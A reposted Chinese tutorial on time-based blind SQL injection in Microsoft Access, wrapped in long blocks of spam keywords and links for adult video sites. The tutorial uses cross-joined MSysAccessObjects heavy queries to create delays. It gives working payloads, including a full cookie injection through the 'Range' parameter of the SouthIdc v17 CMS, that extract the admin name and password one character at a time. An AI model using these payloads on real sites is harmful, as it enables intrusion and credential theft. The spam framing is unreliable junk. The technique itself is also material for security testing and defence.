亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb

首頁 > 數據庫 > Access > 正文

Access數據庫基于時間sql盲注的實現記錄

2024-09-07 19:04:26
字體:
來源:轉載
供稿:網友

   Access是微軟把數據庫引擎的圖形用戶界面和軟件開發工具結合在一起的一個數據庫管理系統。本文我們來看看Access數據庫基于時間sql盲注的實現記錄。

  概述

  眾所周知,access數據庫是不支持基于時間的盲注方式,但是我們可以利用access的系統表MSysAccessObjects,通過多負荷查詢(Heavy Queries)的方式實現。

  初步探究

  我們以SouthIdcv17數據庫為例

  執行 select * from Southidc_About ,返回結果如下圖。

Access數據庫基于時間sql盲注的實現記錄    武林網

  如何實現time base injection 呢?我們就要利用這條語句

  SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12

  具體實現方式如下:

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

  Southidc_Admin)=97

  我們可以執行一次,觀察效果。

  很明顯,經歷了大約40s才返回結果

Access數據庫基于時間sql盲注的實現記錄

  當我們執行如下語句時,也就是把最后的97改為96

  select * from Southidc_About where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from

  Southidc_Admin)=96

Access數據庫基于時間sql盲注的實現記錄

  很快就執行完畢,沒有延時。

  很明顯,我們通過where條件后的

  (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6,

  MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0

  實現了延時,但需要注意的是這里where后的條件是有順序的,實現延時的語句必須在

  1(select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=97

  之前,為什么呢?實驗得出的結論。

  實例實現

  在SouthIdc 17 中,有一處sql注入漏洞,但是常規的方法并不能成功利用漏洞。漏洞代碼如下:

Access數據庫基于時間sql盲注的實現記錄

  雖然程序把Post和Get的數據進行了過濾,但是我們依舊我可以通過Cookie的提交方式進行注入。

  好,我們實現一下注入利用。

  我們需要注入的語句為:

  select * from Southidc_"&request("Range")&"Sort where ViewFlag and ParentID="&ParentID&" order by ID asc

  通過提交cookie

  Range=DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_image

  ParentID為程序上部傳進的值,最終的語句為:

  1select * from Southidc_DownSort where (SELECT count(*) FROM MSysAccessObjects AS T1, MSysAccessObjects AS T2, MSysAccessObjects AS T3, MSysAccessObjects AS T4, MSysAccessObjects AS T5, MSysAccessObjects AS T6, MSysAccessObjects AS T7,MSysAccessObjects AS T8,MSysAccessObjects AS T9,MSysAccessObjects AS T10,MSysAccessObjects AS T11,MSysAccessObjects AS T12)>0 and (select top 1 asc(mid(AdminName+Password,1,1)) from Southidc_Admin)=32 and 1=1 union select NULL,NULL,NULL,NULL,NULL,NULL from Southidc_imageSort where ViewFlag and ParentID=1

  我們可以在查詢器中看一下效果

  96時,不延時,如圖:

Access數據庫基于時間sql盲注的實現記錄

  97時延時,效果如下圖:

Access數據庫基于時間sql盲注的實現記錄

  接下來,我們可以利用上述語句進行exp的編寫,筆者這里用python

  核心代碼如下:

Access數據庫基于時間sql盲注的實現記錄

發表評論 共有條評論
用戶名: 密碼:
驗證碼: 匿名發表
亚洲香蕉成人av网站在线观看_欧美精品成人91久久久久久久_久久久久久久久久久亚洲_热久久视久久精品18亚洲精品_国产精自产拍久久久久久_亚洲色图国产精品_91精品国产网站_中文字幕欧美日韩精品_国产精品久久久久久亚洲调教_国产精品久久一区_性夜试看影院91社区_97在线观看视频国产_68精品久久久久久欧美_欧美精品在线观看_国产精品一区二区久久精品_欧美老女人bb
在线激情影院一区| 国产精品电影久久久久电影网| 九九九热精品免费视频观看网站| 欧美性生交大片免费| 亚洲字幕在线观看| 在线观看国产成人av片| 狠狠久久亚洲欧美专区| 69**夜色精品国产69乱| 中文字幕av日韩| 亚洲成av人乱码色午夜| 岛国av一区二区在线在线观看| 国产精品露脸自拍| 亚洲国产高清福利视频| 国内精品一区二区三区四区| 日韩欧美999| 91精品视频大全| 精品欧美一区二区三区| 久久成人av网站| 97欧美精品一区二区三区| 亚洲电影免费观看高清完整版在线| 久久久久久久999精品视频| 亚洲第一区中文99精品| 欧美成人性色生活仑片| 欧美精品手机在线| 91福利视频网| 97视频在线观看视频免费视频| 欧美另类极品videosbestfree| 久久精品99久久久久久久久| 日韩欧美中文免费| 97久久超碰福利国产精品…| 日韩理论片久久| 久久99国产综合精品女同| 日韩欧美大尺度| 91豆花精品一区| 欧美大学生性色视频| 奇门遁甲1982国语版免费观看高清| 国产精品丝袜高跟| 91视频8mav| 亚洲视频在线观看网站| 亚洲自拍偷拍网址| 精品一区二区电影| 亚洲自拍小视频免费观看| 亚洲精品国偷自产在线99热| 亚洲毛片在线观看| 久久综合网hezyo| 亚洲free性xxxx护士白浆| 久久久久久久久久久亚洲| 久久久国产影院| 欧美激情视频免费观看| 91精品国产高清久久久久久| 久久高清视频免费| 国产成人涩涩涩视频在线观看| 97婷婷涩涩精品一区| 日韩精品电影网| 日韩精品免费综合视频在线播放| 欧美精品激情blacked18| 国产精品第二页| 欧美中文字幕在线| 91日韩在线播放| 在线观看不卡av| 欧美成人午夜免费视在线看片| 国产精品日韩一区| 久久久久免费视频| 久久久亚洲福利精品午夜| 日本在线观看天堂男亚洲| 日韩在线观看免费| 欧美日韩久久久久| 国产精品美乳一区二区免费| 亲子乱一区二区三区电影| 亚洲欧洲在线观看| 精品国内亚洲在观看18黄| 欧美精品videosex极品1| 国产在线视频一区| 亚洲精品在线视频| 亚洲男子天堂网| 狠狠躁18三区二区一区| 亚洲免费伊人电影在线观看av| 国产欧美日韩专区发布| 欧美日韩精品在线播放| 7777精品久久久久久| 国产精品视频一| 亚洲第一福利在线观看| 日韩欧美一区视频| 黑人与娇小精品av专区| 国产91网红主播在线观看| 国产成人精品午夜| 国产精品视频不卡| 九九热这里只有精品免费看| 欧美日韩在线第一页| 欧美亚洲第一区| 久久久久国产一区二区三区| 国产日产欧美精品| 久久久久久久久久久免费| 国产精品视频成人| 欧美精品国产精品日韩精品| 正在播放国产一区| 91精品视频一区| 538国产精品一区二区在线| 日本精品视频在线| 亚洲国产成人一区| 欧美大成色www永久网站婷| 国产亚洲精品成人av久久ww| 永久555www成人免费| 色婷婷av一区二区三区在线观看| 北条麻妃一区二区三区中文字幕| 91视频-88av| 久久久久久久久亚洲| 国产精品一区二区av影院萌芽| 国产精品成人一区二区三区吃奶| 亚洲美腿欧美激情另类| 欧美精品免费在线| 国产免费久久av| 在线亚洲国产精品网| 一本色道久久88综合日韩精品| 欧美亚洲国产另类| 国产97在线播放| 亚洲欧美在线第一页| www.午夜精品| 欧美激情一级精品国产| 中文字幕日韩欧美| 欧美性xxxxhd| 九九综合九九综合| 成人做爽爽免费视频| www.欧美精品| 色多多国产成人永久免费网站| 亚洲综合中文字幕68页| 青草青草久热精品视频在线观看| 久久久久国色av免费观看性色| 在线亚洲午夜片av大片| 亚洲美女av黄| 成人伊人精品色xxxx视频| 久久久免费高清电视剧观看| 久久人人爽亚洲精品天堂| 欧美激情一区二区三区在线视频观看| 国产精品亚洲片夜色在线| 日韩免费观看av| 国产日产欧美a一级在线| 精品久久中文字幕| 国产日韩欧美另类| 隔壁老王国产在线精品| 日韩av在线免费观看| 国产一区二区黄| 久久av在线播放| 欧美性xxxx极品hd欧美风情| 91地址最新发布| 久久中文久久字幕| 亚洲精品国产精品久久清纯直播| 国产91精品久久久久久久| 国产亚洲xxx| 综合136福利视频在线| 色综合亚洲精品激情狠狠| 国内精久久久久久久久久人| 欧美一区第一页| 国产精品老牛影院在线观看| 在线亚洲欧美视频| 精品视频在线播放| 久久伊人免费视频| 久久久久久久av| 美女精品久久久| 国产精品海角社区在线观看| 国产精品三级在线| 欧美日韩在线视频一区二区| 亚洲精品一区二区在线| 亚洲欧美日韩综合|